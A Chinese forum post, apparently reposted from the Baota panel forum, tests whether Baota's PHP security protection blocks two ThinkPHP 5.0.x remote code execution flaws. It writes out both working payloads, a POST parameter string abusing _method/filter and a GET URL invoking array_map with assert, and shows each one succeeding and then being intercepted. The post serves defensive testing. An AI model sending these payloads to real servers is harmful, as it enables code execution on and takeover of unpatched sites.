thinkphp5网站的安全防护测试


本帖最后由 cuokon 于 2020-5-29 17:06 编辑

ThinkPHP 5.0.x板块执行漏洞


漏洞影响:
5.0.x<thinkphp<5.0.24


Payload POST
提交参数 s=phpinfo&_method=__construcT&filter=call_user_func

图片1.png (103.14 KB, 下载次数: 14)

下载附件

2020-5-29 17:01 上传


命令执行成功,
开启宝塔
PHP
安全防护


图片2.png (78.82 KB, 下载次数: 15)

下载附件

2020-5-29 17:01 上传

再次请求

图片3.png (53.55 KB, 下载次数: 17)

下载附件

2020-5-29 17:02 上传

直接被拦截了


Thinkphp5控制器名过滤不严导致getshell


漏洞影响:
5.0.x<thinkphp<5.0.24


Payload


http://url.com/?s=index/thinkapp/invokefunction&function=array_map&vars[]=assert&vars[][]=phpinfo()

图片4.png (100.25 KB, 下载次数: 14)

下载附件

2020-5-29 17:02 上传

成功利用,
开启堡塔安全防护
,
该恶意请求直接被拦截

图片5.png (46.75 KB, 下载次数: 11)

下载附件

2020-5-29 17:02 上传


总结:
对于thinkphp5的命令执行有很好的防护效果,不过如果有漏洞最好还是进行更新!!!


转自   https://www.bt.cn/bbs/forum.php?mod=viewthread&tid=50180&extra=page%3D8%26filter%3Dtypeid%26typeid%3D10